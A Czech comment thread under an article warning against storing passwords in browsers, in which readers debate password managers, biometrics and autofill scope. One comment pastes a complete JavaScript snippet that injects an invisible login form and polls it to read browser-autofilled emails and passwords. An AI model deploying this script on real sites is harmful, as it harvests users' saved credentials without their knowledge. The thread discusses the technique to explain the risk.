Neukládejte si důležitá hesla do prohlížeče. Nejsou tam v bezpečí!

Názory k článku

dolph1888  |  04. 01. 2018 12:38  |  Microsoft Windows 10 Firefox 57.0

Roky, i zde tvrdím, že hesla nemají co dělat nejen v prohlížeči, ale ani v žádném "správci" hesel. Ty, která jsou skutečně důležitá je třeba si pamatovat, případně je mít v ne-elektronické formě. Hesla ukládám (zapisuji, tisknu - lenoch) do bloku, který mám uchován v trezoru* (normální, podlahový), kdo se bojí papíru, ten může hesla ukládat do elektronického zařízení, které se fyzicky nemůže spojit přímo se sítí, případně jen kabelem, který je lehce odpojitelný.
> MS nedávno představil, že hesla jsou OUT a nyní se bude pro přihlašování používat xicht a nevím co ještě. Nesmysl, jak data z otisků prstů, tak dále z obličeje, tvaru těla, duhovky očí, hlasu a nakonec i DNA MUSÍ BÝT PŘEVEDENA A SKLADOVÁNA V DIGITÁLNÍ, ZNEUŽITELNÉ FORMĚ. Když budou taková data KOMPROMITOVÁNA, NENÍ MOŽNÉ ZMĚNIT JEJICH HODNOTY, PROTOŽE NAPŘ. SVOJI DNA ČI XICHT NEPŘEDĚLÁM. Zatímco heslo, které mám v hlavě, změním rychlostí myšlenky, kolikrát denně chci.
* Trezor neslouží primárně jako obrana proti lupičům, ale proti požáru a dalším okolnostem, chrání tedy obsah uvnitř po takovou dobu, na kterou je stavěn.

Souhlasím  |  Nesouhlasím  |  Odpovědi (8)Zavřít odpovědi  |  Odpovědět
alien.cz  |  04. 01. 2018 13:10  |  Microsoft Windows 10 Firefox 57.0

Jo, tohle je skutečný průser především pro tvůrce webových prohlížečů a ne kraviny o úmyslném zpomalování telefonů a touhy po soudních tahanicích s Applem.

Souhlasím  |  Nesouhlasím  |  Odpovědi (10)Zavřít odpovědi  |  Odpovědět
avatar
04. 01. 2018 13:26 | Android AppleMAC-Safari 5.0

Nic nového pod sluncem... I teď někdy ale žasnu nad tím, že si někdo uloží heslo do bankovnictví do prohlížeče, a zapomene ho.

Souhlasím  |  Nesouhlasím  |  Odpovědi (5)Zavřít odpovědi  |  Odpovědět
jjsansk  |  04. 01. 2018 13:33  |  Microsoft Windows 10 Chrome 63.0.3239.84

Ta jsou sice uložena v zašifrované podobě, ale při „předání“ hesla stránce do formulářového pole je pochopitelně dekódováno
akoze pochopitelne? heslo sa sifruje na servery kam pride moj plaintext. ak sa zasifruje moje zasifrovane heslo nikto z toho nic nedostane.

Souhlasím  |  Nesouhlasím  |  Odpovědi (4)Zavřít odpovědi  |  Odpovědět
Jirkas68  |  04. 01. 2018 13:50  |  Linux Firefox 57.0

Dost dobře nechápu tu praktickou zneužitelnost. Heslo prohlížeč vkládá přece jenom na adrese, kde jsem ho před tím uložil, ne? Provozovatel stránky má k němu přístup tak jako tak.
Problém může nastat, když by někdo další vložil do stránky škodlivý kód, ale to je průšvih, ať mám heslo uložené v prohlížeči nebo ne.
Pokud to dělá skript reklamního systému, tak to dělá s vědomím provozovatele stránky a v takovém případě mu buď přestanu věřit anebo začnu používat blokátor reklamy.

Souhlasím  |  Nesouhlasím  |  Odpovědi (7)Zavřít odpovědi  |  Odpovědět
smrt28  |  04. 01. 2018 14:01  |  Linux Chrome 63.0.3239.108

pw manager vyplnuje formulare podle domeny. Kdyz sem na zive, dokaze si stranka zjistit heslo na zive. Kde je problem? Jooo, kdyby se na te demo strance zadavalo heslo na domene X a nasledne se pak ukazalo na strance s domenou Y, to by bylo neci jineho, ale takhle je to "jen clanek na zive"

Souhlasím  |  Nesouhlasím  |  Odpovědi (1)Zavřít odpovědi  |  Odpovědět
jtach  |  04. 01. 2018 16:24  |  Microsoft Windows 10 Chrome 63.0.3239.84

ten script neni zadna bomba:
var injectForm = function(visible) {
console.log("Injecting the form");
var container = document.createElement('div');
if (!visible){
container.style.display = 'none';
}
var form = document.createElement('form');
form.attributes.autocomplete = 'on';
var emailInput = document.createElement('input');
emailInput.attributes.vcard_name = 'vCard.Email';
emailInput.id = 'email';
emailInput.type = 'email';
emailInput.name = 'email';
form.appendChild(emailInput);
var passwordInput = document.createElement('input');
passwordInput.id = 'password';
passwordInput.type = 'password';
passwordInput.name = 'password';
form.appendChild(passwordInput);
container.appendChild(form);
document.body.appendChild(container);
};var printResult = function(elementId, sniffedValue){
document.getElementById("sniffed_" + elementId).innerHTML = " " + sniffedValue + " ";
};var sniffInputField = function(fieldId){
var inputElement = document.getElementById(fieldId);
if (inputElement.value.length){
printResult(fieldId, inputElement.value);
}else{
window.setTimeout(sniffInputField, 200, fieldId); // wait for 200ms
}
};var sniffInputFields = function(){
var inputs = document.getElementsByTagName('input');
for (var i = 0; i < inputs.length; i++) {
console.log("Will try to sniff element with id: " + inputs[i].id);
sniffInputField(inputs[i].id);
}
};var sniffFormInfo = function(visible) {
injectForm(visible);
sniffInputFields();
};var visible_form=false; // will use an invisible form
sniffFormInfo(visible_form);

Souhlasím  |  Nesouhlasím  |  Odpovědět
avatar
04. 01. 2018 16:48 | Linux Chrome 62.0.3202.94

Když do stránky s přihlášením vstupuje nějaký script třetí strany, který není bezpečný (dá se prověřit jednou a pak zabezpečit pomocí atributu integrity to, že se nezmění) vždy může ukrást heslo.
Tady jde jen o zajímavý případ, že heslo může ukrást i z jiné stránky, než je ta přihlašovací.
Naštěstí ale může ukrást jen heslo pro doménu na níž běží web do kterého se script dostane, takže znovu klasika: pro každou službu unikátní heslo. Pak když pro web řekněme žive mi script ukradne heslo je chyba živě, že si takovýto script na web dali. Řekněme banka si na web neznámý script z cizího zdroje nepustí.

Souhlasím  |  Nesouhlasím  |  Odpovědět
SIOGAN  |  05. 01. 2018 01:30  |  Android Chrome 63.0

za to dava pohodli. ano bylo by fajn mit heslo v hlave a vsude mit stejne. ale to by slo kdyby mnoho sluzeb nevyzadovalo zmeny hesla bud casove nastavena nebo pri nekterych aktivitach. navic jeste ani nejde stridat heslaa chteji takove ktere jste jeste nezadali. no a kdyz vas k tomu vyzyva facebook ci skype i v intervalu mesice tak je to na h...o. a kdyby bylo jen na pameti tak pri zadavani hesla chybove tak muze jeste stat ze prijdete o ucet. takze radsi budu spolehat na prohlizec nez na mizivou pravdepodobnost ze nejaka chyba ci utok vyuzije moje heslo. a to bude delat vetsina. a co dela vetsina tam i jde vyvoj a sluzby budou tomu prizpusobovat ne nehaci geeci ci 0.01% linuxaku ci paranoiku.

Souhlasím  |  Nesouhlasím  |  Odpovědět
devy_  |  05. 01. 2018 10:42  |  Microsoft Windows 7 Chrome 63.0.3239.132

narovinu říkám, že jsem líný cokoliv řešit, pokoušel jsem se, ale s ohledem na práci za PC je to pro mě brzda. vyhrálo pohodlí a komfort.Může někdo doporučit bezpečnější variantu, která mě neomezí při přihlašování do služeb? Co jsem četl, tak rádoby "bezpečné" programy na správu hesel již byly taky v minulosti kompromitovány.

Souhlasím  |  Nesouhlasím  |  Odpovědi (1)Zavřít odpovědi  |  Odpovědět
Buffalo007  |  05. 01. 2018 13:32  |  Microsoft Windows 10 Chrome 63.0.3239.108

Jak už tady někdo psal. Pokud uložím heslo třeba na webu gmail.com, tak tento princip bude fungovat pouze na této doméně. Pokud tedy budu na jiném webu, ani skrytá políčka ničemu nepomůžou a prohlížeč žádné přihlašovací údaje nezadá - už jenom proto, že neví pro který web.
Pokud by byl na stránce skript, který by dovolil zjistit z prohlížeče heslo pro třeba předem nastavený web, tak to už by byl závažný bezpečnostní problém.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Zasílat názory e-mailem: Zasílat názory Můj názor
Aktuální číslo časopisu Computer

Jak rychlé je nabíjení bez drátů?

Test 11 sluchátek pro hráče

Aplikace, které vám zachrání dovolenou

Kompletní přehled datových tarifů